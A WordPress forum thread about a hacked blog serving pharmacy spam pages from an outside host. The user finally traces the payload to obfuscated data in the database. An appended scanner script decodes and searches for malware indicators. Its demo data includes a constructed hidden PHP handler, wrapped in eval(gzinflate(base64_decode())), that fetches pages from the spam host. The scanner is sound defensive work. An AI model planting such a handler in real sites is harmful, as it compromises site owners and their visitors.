WordPress.org Forums

What is this hack? (11 posts)

  1. shacker
    Member
    Posted 6 years ago

    One of my users blogs has been hacked or spammed in an interesting way. The following URL is accessible on their blog:

    http://domain.com/?a=buy-drug-name

    If I alter the request, like:

    http://domain.com/?a=buy-drug-namez

    I get a 404 that is NOT served by my server:

    Not Found

    The requested URL /files/buy-cialisz.html was not found on this server.
    Apache/2.0.59 (FreeBSD) mod_ssl/2.0.59 OpenSSL/0.9.7e-p1 mod_perl/2.0.3 Perl/v5.8.8 Server at feed2.pills-searches.com Port 80

    How is this hack working, and what can I do to fix it?

    Thanks much.

    The blog is up to date with 2.2.2. What mechanism in WP uses URLs with this format? Anyone know how this hack might have occurred?

  2. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago

    Look closely at their .htaccess file.

    Without the real URL to examine the output from, I can't say for certain, but I'm betting that it's just redirecting to this other server.

    "?a=" in specific is not used by WordPress, to my knowledge.

  3. whooami
    Member
    Posted 6 years ago

    Server at feed2.pills-searches.com

    uh?

  4. whooami
    Member
    Posted 6 years ago

    Edited: I'm a fruit.

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago

    whooami: I think the site that was hacked is redirecting to this feeds pills thing. This is unlikely to be the site he's talking about.

  6. whooami
    Member
    Posted 6 years ago

    Oops, I've edited this -- my own reading skills apparently suck today.

    Never mind me.

  7. shacker
    Member
    Posted 6 years ago

    Otto - .htaccess was the first place I looked, and it's pristine. No redirection going on there. And there are no other .htaccess files up the file tree to the docroot. I've also grepped the httpd.conf files for "pills" but there's no trace.

    Doesn't WP also have its own built-in redirection mechanism? I'm wondering whether that's in play here (as I can't think of any other way for redirection to occur). Anywhere else you can think of in a WP install that might handle or manage redirection?

    Thanks.

  8. shacker
    Member
    Posted 6 years ago

    Upgraded to 2.3 - the hack persists. Deactivated all plugins - the hack persists.

    This is a serious, and very mysterious hack. Am I really the only person experiencing this?

  9. whooami
    Member
    Posted 6 years ago

    Upgraded... how?

    Did you delete ALL of the files prior to?

    It's highly unlikely that something attributable to WordPress is going to exist across versions.

    So you look in the files that you didn't replace -- namely theme files, wp-config.php, wp-settings.php perhaps.

    Second, you remove your .htaccess file(s).

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago

    > This is a serious, and very mysterious hack. Am I really the only person experiencing this?

    Yes, you are.

    And nobody can look at your code for you. If the functionality exists, then it exists on the site.

    Nobody can say how it works without examining the site in detail.

  11. shacker
    Member
    Posted 6 years ago

    > Yes, you are.

    I don't believe that - this was clearly a well-executed exploit of some known issue. I may be the only person looking at this thread having this experience, but definitely not the only person. This hack was too well-crafted.

    > And nobody can look at your code for you. If the functionality exists, then it exists on the site.

    I don't expect anyone to look at my code! I'm just looking for tips on where else to look, since I've tried all of the obvious things. That's what communities are for.

    OK, an update: Since I had grepped everything every which way to Sunday, I dropped all Akismet spam, did a mysqldump, and searched that for the terms in question. I found them in a VERY long INSERT INTO wp_options statement, connected with Magpie RSS. The blog in question is using the RSS module for sidebar widgets, so I'm wondering whether there could have been an exploit in that. Anyway, that gave me a clue, so I found every row in the table that mentioned Magpie and deleted them. Was sure that would fix it, but nope - the problem persisted.

    Then I thought there must be an RSS cache somewhere, but could not find one.

    Finally I backed up the DB, did an XML export, moved the install out of the way, dropped the db, and started over. After importing the XML into a fresh copy of WP, the problem went away. This means one of two things: A) The problem was in a file that the 2.3 upgrade didn't touch (and that was grep resistant) or B) the problem data was still in the database, but obfuscated so as to not be searchable. And it must have been some data that the XML exporter didn't export.

    So now the blog is clean again. I've changed the mysql password, and am not using the RSS sidebar widgets until I find out more. But I'm having trouble finding out more - just can't find a reference to this problem anywhere. Very weird.

    Scot
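Editor's added example (not code from this thread, from WordPress, or from Magpie): a scanner that does what whooami's post 9 asks for (look in the files an upgrade leaves alone: themes, wp-config.php, .htaccess) and what Scot's post 11 found the hard way (the payload lived in a wp_options row and was "obfuscated so as to not be searchable"). A plain grep for the hostname fails on base64 or gzdeflate-wrapped code, so the scanner peels base64, raw DEFLATE, zlib and rot13 layers before searching each one. Everything below the "constructed sample data" line is invented for the demo: the hidden handler is a hypothetical stand-in consistent with the symptom in post 1 (the request `?a=NAME` came back as `/files/NAME.html` from the spam host; the real code was never recovered), and the option name, file paths and dump row are made up. The hostname feed2.pills-searches.com is the one on the 404 page quoted in post 1.

```python
from __future__ import annotations

import base64
import binascii
import codecs
import re
import tempfile
import zlib
from pathlib import Path

# Strings worth reporting once every encoding layer has been peeled away. The
# hostname is the one on the 404 page quoted in post 1; the rest are PHP
# constructs that have no business in theme files or in wp_options rows.
INDICATORS = ("pills-searches.com", "$_GET['a']", '$_GET["a"]', "eval(",
              "gzinflate(", "base64_decode(", "str_rot13(")

B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")  # base64 run worth decoding
MAX_DEPTH = 6  # stop peeling nested layers past this depth


def _as_text(data: bytes) -> str | None:
    """Return data as UTF-8 text, or None if it is binary rather than code."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if text and printable >= 0.9 * len(text) else None


def peel(text: str, depth: int = 0) -> list[tuple[int, str]]:
    """Return (depth, text) for the input plus every base64, DEFLATE/zlib and
    rot13 layer that can be peeled off it, so a keyword search sees them all."""
    layers = [(depth, text)]
    if depth >= MAX_DEPTH:
        return layers
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        candidates = [raw]
        # PHP gzinflate() reads raw DEFLATE (wbits=-15); gzuncompress() reads zlib (15).
        for wbits in (-15, 15):
            try:
                candidates.append(zlib.decompress(raw, wbits))
            except zlib.error:
                pass
        for blob in candidates:
            inner = _as_text(blob)
            if inner:
                layers.extend(peel(inner, depth + 1))
    # str_rot13 is its own inverse: one pass exposes rot13'd code; recursing
    # on it would just flip the text back and forth.
    rotated = codecs.decode(text, "rot_13")
    if rotated != text:
        layers.append((depth + 1, rotated))
    return layers


def find_indicators(text: str) -> list[tuple[int, str]]:
    """Sorted (depth, indicator) pairs found in any layer of text; depth 0 is plain text."""
    return sorted({(d, ind) for d, layer in peel(text) for ind in INDICATORS if ind in layer})


def scan_tree(root: Path) -> dict[str, list[tuple[int, str]]]:
    """Scan PHP files and .htaccess under root; return {relative path: hits}."""
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and (path.suffix in (".php", ".inc") or path.name == ".htaccess"):
            hits = find_indicators(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


_SQL_STR = re.compile(r"'((?:[^'\\]|\\.)*)'")
_SQL_ESC = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "Z": "\x1a"}


def unescape_mysql(literal: str) -> str:
    """Undo mysqldump's backslash escaping so serialized PHP and base64 stay intact."""
    return re.sub(r"\\(.)", lambda m: _SQL_ESC.get(m.group(1), m.group(1)), literal)


def scan_dump(dump: str) -> list[tuple[str, list[tuple[int, str]]]]:
    """Scan every quoted literal on the dump's INSERT lines (mysqldump writes one
    extended INSERT per line); return (value preview, hits) for literals that hit."""
    findings = []
    for line in dump.splitlines():
        if line.startswith("INSERT INTO"):
            for literal in _SQL_STR.findall(line):
                value = unescape_mysql(literal)
                hits = find_indicators(value)
                if hits:
                    findings.append((value[:40], hits))
    return findings


# --- constructed sample data (hypothetical, not recovered from the thread) ---
def _wrap(code: str) -> str:
    """base64_encode(gzdeflate($code)): the wrapping eval(gzinflate(base64_decode())) expects."""
    deflater = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(deflater.compress(code.encode()) + deflater.flush()).decode()


HIDDEN = ("if (isset($_GET['a'])) { readfile('http://feed2.pills-searches.com/files/'"
          " . $_GET['a'] . '.html'); exit; }")  # stand-in for the unrecovered handler
CLEAN_THEME = "<?php get_header(); ?>\n<?php the_content(); ?>\n<?php get_footer(); ?>\n"
SAMPLE_THEME = CLEAN_THEME + "<?php eval(gzinflate(base64_decode('" + _wrap(HIDDEN) + "'))); ?>\n"
# A Magpie-style cache row whose serialized value hides the same blob; mysqldump escapes " as \".
_BLOB = _wrap(HIDDEN)
_SERIALIZED = f'a:1:{{s:4:"code";s:{len(_BLOB)}:"{_BLOB}";}}'.replace('"', '\\"')
SAMPLE_DUMP = ("INSERT INTO `wp_options` VALUES (1,'siteurl','http://domain.com','yes'),"
               f"(2,'rss_7f3c1a','{_SERIALIZED}','no');\n")


def demo_tree() -> dict[str, list[tuple[int, str]]]:
    """Write the constructed theme files to a scratch directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "default"
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(CLEAN_THEME)
        (theme / "footer.php").write_text(SAMPLE_THEME)
        (Path(tmp) / ".htaccess").write_text("RewriteEngine On\n")
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    print("plain grep sees the hostname in footer.php:", "pills-searches.com" in SAMPLE_THEME)
    for path, hits in demo_tree().items():
        print(path, hits)
    for preview, hits in scan_dump(SAMPLE_DUMP):
        print(repr(preview), hits)
```

Run it as-is to see the demo, or point `scan_tree()` at a real docroot and `scan_dump()` at the text of a mysqldump; hits at depth 0 are visible to grep, hits at depth 1 or deeper are the ones grep missed. Add whatever hostnames or strings appear in your own symptom to INDICATORS.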

This topic has been closed to new replies.